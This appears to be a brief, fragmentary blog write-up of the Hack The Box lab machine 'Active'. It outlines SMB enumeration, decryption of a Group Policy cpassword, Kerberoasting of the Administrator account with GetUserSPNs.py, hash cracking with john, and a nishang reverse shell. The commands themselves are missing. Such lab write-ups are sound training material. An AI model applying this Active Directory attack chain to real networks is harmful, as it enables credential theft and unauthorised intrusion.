Today I explore Active from HTB; an OSCP like box featuring a great approach to SMB enumeration with SMBClient and CrackMapExec (cme). I started by running an AutoRecon scan which showed me
I have mentioned AutoRecon in (every) guide so look at my previous posts for more information.
SMBClient shows a share, Replication available as Read. I use
CME to verify:
CME shows I can read Replication with
I log in to SMBClient with the
--no-pass flag and look around the directories. Eventually, I find Groups.xml which I pull to my local machine. Inside is a
cpassword which I decrypted with the help of gpp-decrypt. For more information regarding
cpasswords go HERE.
Finding Groups.xml and a password.
Using the password found I use
GetUserSPNs.py to find the Administrator hash. I crack this hash with the help of
GetUserSPNs.py grabbing the Administrator accounts hash.
john to grab the
Using the Administrator password,
Invoke-PowerShellTCP.ps1 from nishang I get a shell onto the box and root:
Using the Admin creds alongside
Invoke-PowerShellTCP to launch a shell.
HTB Active proof (not clean) as & param kept dropping the shell.